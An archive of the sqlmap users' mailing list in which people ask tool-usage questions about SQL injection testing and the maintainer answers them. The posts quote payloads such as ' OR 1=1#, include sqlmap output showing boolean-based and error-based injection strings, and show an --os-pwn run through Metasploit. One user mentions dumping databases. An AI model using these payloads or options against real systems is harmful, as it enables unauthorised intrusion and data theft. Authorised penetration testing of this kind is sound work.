sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Problem with a Login

[Brandon P. <bpe...@gm...>]

What command and arguments are you using exactly?

Sent from a phone

> On Dec 4, 2016, at 8:06 AM, Daniele Bianchin <bbi...@gm...> wrote:
> 
> Hi!
> I have an issue with sqlmap.
> I created my own fake login in order to test blind sql injection but everytime i make a test sqlmap says it isn't exploitable.
> I tried to add a suffix, set level to 5, set risk to 3, set not-string option but sqlmap still not work with it.
> The login source is: http://pastebin.com/xzKZJNB1
> 
> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
> What should i do?
> 
> Thanks in advance!
> 
> 
> Daniele.
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most 
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] Problem with a Login

[Daniele B. <bbi...@gm...>]

Hi!
I have an issue with sqlmap.
I created my own fake login in order to test blind sql injection but
everytime i make a test sqlmap says it isn't exploitable.
I tried to add a suffix, set level to 5, set risk to 3, set not-string
option but sqlmap still not work with it.
The login source is: http://pastebin.com/xzKZJNB1

I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL
SELECT NULL;NULL #, etc... and they work.
What should i do?

Thanks in advance!


Daniele.

[sqlmap-users] (no subject)

[Gary M. <gar...@gm...>]

Re: [sqlmap-users] Inject in one parameter and increment another

[Ricardo I. d. S. <ri...@gm...>]

Thanks a lot!
If there is a doc explaining a little about the sqlmap code structure
maybe I can help with this feature.
I know a little of python but in this case I think the biggest problem
would be find the right part of sqlmap code to include/change.


On Fri, Aug 19, 2016 at 6:19 AM, Miroslav Stampar
<mir...@gm...> wrote:
> Currently there is no way. Will implement it when I catch time
> (https://github.com/sqlmapproject/sqlmap/issues/1679).
>
> Bye
>
> On Thu, Aug 18, 2016 at 11:35 PM, Ricardo Iramar dos Santos
> <ri...@gm...> wrote:
>>
>> I checked and burp replace feature doesn't have any kind of parameter
>> to include a incremental number. :(
>> I'll check mitmproxy.
>>
>> On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos
>> <ri...@gm...> wrote:
>> > Great idea!!! Thanks!!! :)
>> > I'll try and let you know the results.
>> >
>> > On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry
>> > <bpe...@gm...> wrote:
>> >> You can write a burp rule that rewrites a specific value that you set
>> >> in the SOAP body with an incrementing integer as sqlmap is exploiting the
>> >> sqlinjection (it wouldn’t realize the parameter needed to be incremented).
>> >>
>> >> You can use —proxy to send sqlmap through burp.
>> >>
>> >>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos
>> >>> <ri...@gm...> wrote:
>> >>>
>> >>> I have a SOAP POST request where two different should be unique. One
>> >>> is an Email and another UserID.
>> >>> Is there a way to inject on Email having the email domain (e.g.
>> >>> @gmail.com) as a suffix and increment the UserID parameter (e.g.
>> >>> starting from 100)?
>> >>>
>> >>> Thanks!
>> >>> Ricardo Iramar
>> >>>
>> >>>
>> >>> ------------------------------------------------------------------------------
>> >>> _______________________________________________
>> >>> sqlmap-users mailing list
>> >>> sql...@li...
>> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>>
>>
>> ------------------------------------------------------------------------------
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] Change cookies on each sqlmap request

[Miroslav S. <mir...@gm...>]

Hi.

One way is a direct approach:

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1"
--cookie="cid=1" --eval='cid=2' -v 5
...
GET /artists.php?artist=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0.8.20#dev (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: testphp.vulnweb.com
Cookie: cid=2
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close

Bye

On Fri, Aug 19, 2016 at 5:10 PM, Benjamin Vassmer <bva...@gm...>
wrote:

> I am trying to run sqlmap against a site that uses single-use URLs. I am
> able using the --eval parameter to run a bash script that creates a fresh
> cookie for each request, but I cannot seem to find a way to load that
> cookie with every request.
>
> I have tried the --load-cookies parameter, but it only loads at sqlmap
> start. Is there a way to direct --load-cookies to a script? Or an alternate
> way to change the cookie with each request?
>
> Thanks for your (cumulative) knowledge.
>
> Benjamin
>
> ------------------------------------------------------------
> ------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Change cookies on each sqlmap request

[Benjamin V. <bva...@gm...>]

I am trying to run sqlmap against a site that uses single-use URLs. I am
able using the --eval parameter to run a bash script that creates a fresh
cookie for each request, but I cannot seem to find a way to load that
cookie with every request.

I have tried the --load-cookies parameter, but it only loads at sqlmap
start. Is there a way to direct --load-cookies to a script? Or an alternate
way to change the cookie with each request?

Thanks for your (cumulative) knowledge.

Benjamin

Re: [sqlmap-users] Inject in one parameter and increment another

[Miroslav S. <mir...@gm...>]

Currently there is no way. Will implement it when I catch time (
https://github.com/sqlmapproject/sqlmap/issues/1679).

Bye

On Thu, Aug 18, 2016 at 11:35 PM, Ricardo Iramar dos Santos <
ri...@gm...> wrote:

> I checked and burp replace feature doesn't have any kind of parameter
> to include a incremental number. :(
> I'll check mitmproxy.
>
> On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos
> <ri...@gm...> wrote:
> > Great idea!!! Thanks!!! :)
> > I'll try and let you know the results.
> >
> > On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry
> > <bpe...@gm...> wrote:
> >> You can write a burp rule that rewrites a specific value that you set
> in the SOAP body with an incrementing integer as sqlmap is exploiting the
> sqlinjection (it wouldn’t realize the parameter needed to be incremented).
> >>
> >> You can use —proxy to send sqlmap through burp.
> >>
> >>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <
> ri...@gm...> wrote:
> >>>
> >>> I have a SOAP POST request where two different should be unique. One
> >>> is an Email and another UserID.
> >>> Is there a way to inject on Email having the email domain (e.g.
> >>> @gmail.com) as a suffix and increment the UserID parameter (e.g.
> >>> starting from 100)?
> >>>
> >>> Thanks!
> >>> Ricardo Iramar
> >>>
> >>> ------------------------------------------------------------
> ------------------
> >>> _______________________________________________
> >>> sqlmap-users mailing list
> >>> sql...@li...
> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
>
> ------------------------------------------------------------
> ------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Inject in one parameter and increment another

[Ricardo I. d. S. <ri...@gm...>]

I checked and burp replace feature doesn't have any kind of parameter
to include a incremental number. :(
I'll check mitmproxy.

On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos
<ri...@gm...> wrote:
> Great idea!!! Thanks!!! :)
> I'll try and let you know the results.
>
> On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry
> <bpe...@gm...> wrote:
>> You can write a burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the sqlinjection (it wouldn’t realize the parameter needed to be incremented).
>>
>> You can use —proxy to send sqlmap through burp.
>>
>>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote:
>>>
>>> I have a SOAP POST request where two different should be unique. One
>>> is an Email and another UserID.
>>> Is there a way to inject on Email having the email domain (e.g.
>>> @gmail.com) as a suffix and increment the UserID parameter (e.g.
>>> starting from 100)?
>>>
>>> Thanks!
>>> Ricardo Iramar
>>>
>>> ------------------------------------------------------------------------------
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>

Re: [sqlmap-users] Inject in one parameter and increment another

[Ricardo I. d. S. <ri...@gm...>]

Great idea!!! Thanks!!! :)
I'll try and let you know the results.

On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry
<bpe...@gm...> wrote:
> You can write a burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the sqlinjection (it wouldn’t realize the parameter needed to be incremented).
>
> You can use —proxy to send sqlmap through burp.
>
>> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote:
>>
>> I have a SOAP POST request where two different should be unique. One
>> is an Email and another UserID.
>> Is there a way to inject on Email having the email domain (e.g.
>> @gmail.com) as a suffix and increment the UserID parameter (e.g.
>> starting from 100)?
>>
>> Thanks!
>> Ricardo Iramar
>>
>> ------------------------------------------------------------------------------
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] Inject in one parameter and increment another

[Brandon P. <bpe...@gm...>]

You can write a burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the sqlinjection (it wouldn’t realize the parameter needed to be incremented).

You can use —proxy to send sqlmap through burp.

> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote:
> 
> I have a SOAP POST request where two different should be unique. One
> is an Email and another UserID.
> Is there a way to inject on Email having the email domain (e.g.
> @gmail.com) as a suffix and increment the UserID parameter (e.g.
> starting from 100)?
> 
> Thanks!
> Ricardo Iramar
> 
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] Inject in one parameter and increment another

[Ricardo I. d. S. <ri...@gm...>]

I have a SOAP POST request where two different should be unique. One
is an Email and another UserID.
Is there a way to inject on Email having the email domain (e.g.
@gmail.com) as a suffix and increment the UserID parameter (e.g.
starting from 100)?

Thanks!
Ricardo Iramar

Re: [sqlmap-users] quiet after 3 error

[Miroslav S. <mir...@gm...>]

Is there any specific question that is preceding? Currently there is no way
to declare explicitly what you want.

Bye

On Aug 4, 2016 03:25, "Indra Zulkarnain" <net...@gm...> wrote:

> hi guys
>
> is there a way to abort sqli attack on sqlmap after the third error
>
> i used to keep sqlmap running in the server to dump database when the vuln
> is sqli time based
> but i want the sqlmap to stop retrying after the third error
>
> thanks
> Indra Z
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] quiet after 3 error

[Indra Z. <net...@gm...>]

hi guys

is there a way to abort sqli attack on sqlmap after the third error

i used to keep sqlmap running in the server to dump database when the vuln
is sqli time based
but i want the sqlmap to stop retrying after the third error

thanks
Indra Z

Re: [sqlmap-users] boolean based blind on progress db

[Miroslav S. <mir...@gm...>]

Hi.

This looks like a false positive. Please rerun with --flush-session.

Kind regards


On Mon, Aug 1, 2016 at 12:57 PM, Niall <jam...@gm...> wrote:

> Hi,
>
> I am using SQLMAP to pen test a web app and it says that a field is
> boolean based blind vunerable.
>
> The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support
> this DBMS. However, can I still use it to test whether there is a SQL
> injection vulnerability (and not exploit it) or will it not detect the
> vulnerability at all?
>
> I am not sure whether SQLMAP cannot get any info out of the DB because
> Progress is unsupported or it is a false-positive.
>
> Below is SQLMAP output (If I run the exact same query on the DB itself it
> returns data):
>
> sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from
> pub.role_type" --no-cast --threads=2
>          _
>  ___ ___| |_____ ___ ___  {1.0.7.1#dev}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 11:53:57
>
> [11:53:57] [INFO] resuming back-end DBMS 'mysql'
> [11:53:57] [INFO] testing connection to the target URL
> [11:53:57] [CRITICAL] previous heuristics detected that the target is
> protected by some kind of WAF/IPS/IDS
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: host (GET)
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp
> ---
> [11:53:57] [INFO] the back-end DBMS is MySQL
> back-end DBMS: MySQL 5 (MariaDB fork)
> [11:53:57] [INFO] fetching SQL SELECT statement query output: 'select
> ('role') from pub.role_type'
> [11:53:57] [INFO] retrieving the length of query output
> [11:53:57] [INFO] retrieved:
> [11:53:57] [INFO] retrieved:
> select ('role') from pub.role_type: None
> [11:53:58] [INFO] fetched data logged to text files under
> '/root/.sqlmap/output/'
>
> [*] shutting down at 11:53:58
>
>
> Thank you for your help.
>
>
>
> ------------------------------------------------------------------------------
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] boolean based blind on progress db

[Niall <jam...@gm...>]

Hi,

I am using SQLMAP to pen test a web app and it says that a field is boolean
based blind vunerable.

The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support
this DBMS. However, can I still use it to test whether there is a SQL
injection vulnerability (and not exploit it) or will it not detect the
vulnerability at all?

I am not sure whether SQLMAP cannot get any info out of the DB because
Progress is unsupported or it is a false-positive.

Below is SQLMAP output (If I run the exact same query on the DB itself it
returns data):

sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from
pub.role_type" --no-cast --threads=2
         _
 ___ ___| |_____ ___ ___  {1.0.7.1#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 11:53:57

[11:53:57] [INFO] resuming back-end DBMS 'mysql'
[11:53:57] [INFO] testing connection to the target URL
[11:53:57] [CRITICAL] previous heuristics detected that the target is
protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: host (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp
---
[11:53:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[11:53:57] [INFO] fetching SQL SELECT statement query output: 'select
('role') from pub.role_type'
[11:53:57] [INFO] retrieving the length of query output
[11:53:57] [INFO] retrieved:
[11:53:57] [INFO] retrieved:
select ('role') from pub.role_type: None
[11:53:58] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/'

[*] shutting down at 11:53:58


Thank you for your help.

[sqlmap-users] bro i cand run my pc

[armen R. <arm...@ya...>]

hi bro i cand run my pc python sqlmap.py so pls helpe me now

Re: [sqlmap-users] inverting --string and --not-string

[Miroslav S. <mir...@gm...>]

Changed wiki pages for --string to:
...which should be present on original page (though it is not a
requirement)...

Bye

On Sat, Apr 23, 2016 at 4:40 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Just checked.
>
> sqlmap only warns that there is no --string in original response. So, I
> just need to change the wiki pages accordingly
>
> Bye
>
> On Fri, Apr 22, 2016 at 5:43 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> p.s. "Will check current status now" -> "Will check current status later
>> today"
>> On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...>
>> wrote:
>>
>>> Ok. This makes way more sense :). Now commuting. Will check current
>>> status now (will drop checking in original if it is the case now).
>>>
>>> Bye
>>> On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote:
>>>
>>>> Let me try to put this another way.  According to the usage doc:
>>>>
>>>> "Sometimes it may fail, that is why the user can provide a string
>>>> (--string option) which is always present on original page and on all True
>>>> injected query pages, but that it is not on the False ones."
>>>>
>>>> Is there a way to invert this logic so that "--string" works for
>>>> strings that are present on original page and all *true* ones?
>>>>
>>>> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>
>>>>> This doesn't make any sense. With --string either there is a string
>>>>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete
>>>>> opposite.
>>>>>
>>>>> You are asking for 4 states: 1) with string and not-string; 2) with
>>>>> string and no not-string; 3) without string and with not-string; and 4)
>>>>> without string and without not-string
>>>>>
>>>>> Please reconsider your whole use-case.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...>
>>>>> wrote:
>>>>>
>>>>>> I'm testing a system where no injection and false injections produce
>>>>>> page A, but true injections produce page B.
>>>>>>
>>>>>> sqlmap doesn't support setting both --string and --not-string, and
>>>>>> these options assume the opposite of the above, so I don't see a way to
>>>>>> handle this unusual situation.
>>>>>>
>>>>>> Suggestions?
>>>>>> Thanks!
>>>>>> -tm
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Find and fix application performance issues faster with Applications
>>>>>> Manager
>>>>>> Applications Manager provides deep performance insights into multiple
>>>>>> tiers of
>>>>>> your business applications. It resolves application problems quickly
>>>>>> and
>>>>>> reduces your MTTR. Get your free trial!
>>>>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>>
>>>>
>>>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] inverting --string and --not-string

[Miroslav S. <mir...@gm...>]

Just checked.

sqlmap only warns that there is no --string in original response. So, I
just need to change the wiki pages accordingly

Bye

On Fri, Apr 22, 2016 at 5:43 PM, Miroslav Stampar <
mir...@gm...> wrote:

> p.s. "Will check current status now" -> "Will check current status later
> today"
> On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...>
> wrote:
>
>> Ok. This makes way more sense :). Now commuting. Will check current
>> status now (will drop checking in original if it is the case now).
>>
>> Bye
>> On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote:
>>
>>> Let me try to put this another way.  According to the usage doc:
>>>
>>> "Sometimes it may fail, that is why the user can provide a string
>>> (--string option) which is always present on original page and on all True
>>> injected query pages, but that it is not on the False ones."
>>>
>>> Is there a way to invert this logic so that "--string" works for strings
>>> that are present on original page and all *true* ones?
>>>
>>> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>
>>>> This doesn't make any sense. With --string either there is a string
>>>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete
>>>> opposite.
>>>>
>>>> You are asking for 4 states: 1) with string and not-string; 2) with
>>>> string and no not-string; 3) without string and with not-string; and 4)
>>>> without string and without not-string
>>>>
>>>> Please reconsider your whole use-case.
>>>>
>>>> Bye
>>>>
>>>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...>
>>>> wrote:
>>>>
>>>>> I'm testing a system where no injection and false injections produce
>>>>> page A, but true injections produce page B.
>>>>>
>>>>> sqlmap doesn't support setting both --string and --not-string, and
>>>>> these options assume the opposite of the above, so I don't see a way to
>>>>> handle this unusual situation.
>>>>>
>>>>> Suggestions?
>>>>> Thanks!
>>>>> -tm
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Find and fix application performance issues faster with Applications
>>>>> Manager
>>>>> Applications Manager provides deep performance insights into multiple
>>>>> tiers of
>>>>> your business applications. It resolves application problems quickly
>>>>> and
>>>>> reduces your MTTR. Get your free trial!
>>>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] inverting --string and --not-string

[Miroslav S. <mir...@gm...>]

p.s. "Will check current status now" -> "Will check current status later
today"
On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...>
wrote:

> Ok. This makes way more sense :). Now commuting. Will check current status
> now (will drop checking in original if it is the case now).
>
> Bye
> On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote:
>
>> Let me try to put this another way.  According to the usage doc:
>>
>> "Sometimes it may fail, that is why the user can provide a string
>> (--string option) which is always present on original page and on all True
>> injected query pages, but that it is not on the False ones."
>>
>> Is there a way to invert this logic so that "--string" works for strings
>> that are present on original page and all *true* ones?
>>
>> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>
>>> This doesn't make any sense. With --string either there is a string
>>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete
>>> opposite.
>>>
>>> You are asking for 4 states: 1) with string and not-string; 2) with
>>> string and no not-string; 3) without string and with not-string; and 4)
>>> without string and without not-string
>>>
>>> Please reconsider your whole use-case.
>>>
>>> Bye
>>>
>>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote:
>>>
>>>> I'm testing a system where no injection and false injections produce
>>>> page A, but true injections produce page B.
>>>>
>>>> sqlmap doesn't support setting both --string and --not-string, and
>>>> these options assume the opposite of the above, so I don't see a way to
>>>> handle this unusual situation.
>>>>
>>>> Suggestions?
>>>> Thanks!
>>>> -tm
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Find and fix application performance issues faster with Applications
>>>> Manager
>>>> Applications Manager provides deep performance insights into multiple
>>>> tiers of
>>>> your business applications. It resolves application problems quickly and
>>>> reduces your MTTR. Get your free trial!
>>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>

Re: [sqlmap-users] inverting --string and --not-string

[Miroslav S. <mir...@gm...>]

Ok. This makes way more sense :). Now commuting. Will check current status
now (will drop checking in original if it is the case now).

Bye
On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote:

> Let me try to put this another way.  According to the usage doc:
>
> "Sometimes it may fail, that is why the user can provide a string
> (--string option) which is always present on original page and on all True
> injected query pages, but that it is not on the False ones."
>
> Is there a way to invert this logic so that "--string" works for strings
> that are present on original page and all *true* ones?
>
> On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> This doesn't make any sense. With --string either there is a string
>> (TRUE) or there isn't (FALSE). In case of --not-string it's the complete
>> opposite.
>>
>> You are asking for 4 states: 1) with string and not-string; 2) with
>> string and no not-string; 3) without string and with not-string; and 4)
>> without string and without not-string
>>
>> Please reconsider your whole use-case.
>>
>> Bye
>>
>> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote:
>>
>>> I'm testing a system where no injection and false injections produce
>>> page A, but true injections produce page B.
>>>
>>> sqlmap doesn't support setting both --string and --not-string, and these
>>> options assume the opposite of the above, so I don't see a way to handle
>>> this unusual situation.
>>>
>>> Suggestions?
>>> Thanks!
>>> -tm
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Find and fix application performance issues faster with Applications
>>> Manager
>>> Applications Manager provides deep performance insights into multiple
>>> tiers of
>>> your business applications. It resolves application problems quickly and
>>> reduces your MTTR. Get your free trial!
>>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>

Re: [sqlmap-users] inverting --string and --not-string

[Tim M. <tma...@gm...>]

Let me try to put this another way.  According to the usage doc:

"Sometimes it may fail, that is why the user can provide a string (--string
option) which is always present on original page and on all True injected
query pages, but that it is not on the False ones."

Is there a way to invert this logic so that "--string" works for strings
that are present on original page and all *true* ones?

On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <
mir...@gm...> wrote:

> This doesn't make any sense. With --string either there is a string (TRUE)
> or there isn't (FALSE). In case of --not-string it's the complete opposite.
>
> You are asking for 4 states: 1) with string and not-string; 2) with string
> and no not-string; 3) without string and with not-string; and 4) without
> string and without not-string
>
> Please reconsider your whole use-case.
>
> Bye
>
> On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote:
>
>> I'm testing a system where no injection and false injections produce page
>> A, but true injections produce page B.
>>
>> sqlmap doesn't support setting both --string and --not-string, and these
>> options assume the opposite of the above, so I don't see a way to handle
>> this unusual situation.
>>
>> Suggestions?
>> Thanks!
>> -tm
>>
>>
>> ------------------------------------------------------------------------------
>> Find and fix application performance issues faster with Applications
>> Manager
>> Applications Manager provides deep performance insights into multiple
>> tiers of
>> your business applications. It resolves application problems quickly and
>> reduces your MTTR. Get your free trial!
>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

Re: [sqlmap-users] inverting --string and --not-string

[Miroslav S. <mir...@gm...>]

This doesn't make any sense. With --string either there is a string (TRUE)
or there isn't (FALSE). In case of --not-string it's the complete opposite.

You are asking for 4 states: 1) with string and not-string; 2) with string
and no not-string; 3) without string and with not-string; and 4) without
string and without not-string

Please reconsider your whole use-case.

Bye

On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote:

> I'm testing a system where no injection and false injections produce page
> A, but true injections produce page B.
>
> sqlmap doesn't support setting both --string and --not-string, and these
> options assume the opposite of the above, so I don't see a way to handle
> this unusual situation.
>
> Suggestions?
> Thanks!
> -tm
>
>
> ------------------------------------------------------------------------------
> Find and fix application performance issues faster with Applications
> Manager
> Applications Manager provides deep performance insights into multiple
> tiers of
> your business applications. It resolves application problems quickly and
> reduces your MTTR. Get your free trial!
> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] inverting --string and --not-string

[Tim M. <tma...@gm...>]

I'm testing a system where no injection and false injections produce page
A, but true injections produce page B.

sqlmap doesn't support setting both --string and --not-string, and these
options assume the opposite of the above, so I don't see a way to handle
this unusual situation.

Suggestions?
Thanks!
-tm

Re: [sqlmap-users] mysql os-pwn options on windows

[Miroslav S. <mir...@gm...>]

In your case, problem is the --tmp-path. Have you manually set it to
"/tmp"? If so, it is wrongly set to a linux path while you should put it to
a remote (Windows) location (...--tmp-path=TMPPATH  Remote absolute path of
temporary files directory)

Bye

On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar <
mir...@gm...> wrote:

> $ sudo python sqlmap.py -u "
> http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
> [sudo] password for stamparm:
>          _
>  ___ ___| |_____ ___ ___  {1.0.4.21#dev}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:11:45
>
> [09:11:45] [WARNING] you did not provide the local path where Metasploit
> Framework is installed
> [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
> installation inside the environment path(s)
> [09:11:45] [INFO] Metasploit Framework has been found installed in the
> '/usr/bin' path
> [09:11:45] [INFO] resuming back-end DBMS 'mysql'
> [09:11:45] [INFO] testing connection to the target URL
> [09:11:45] [INFO] heuristics detected web page charset 'ascii'
> [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
> which could interfere with the results of the tests
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=1 AND 2546=2546
>
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
> BY clause
>     Payload: id=1 AND (SELECT 8079 FROM(SELECT
> COUNT(*),CONCAT(0x7178767071,(SELECT
> (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
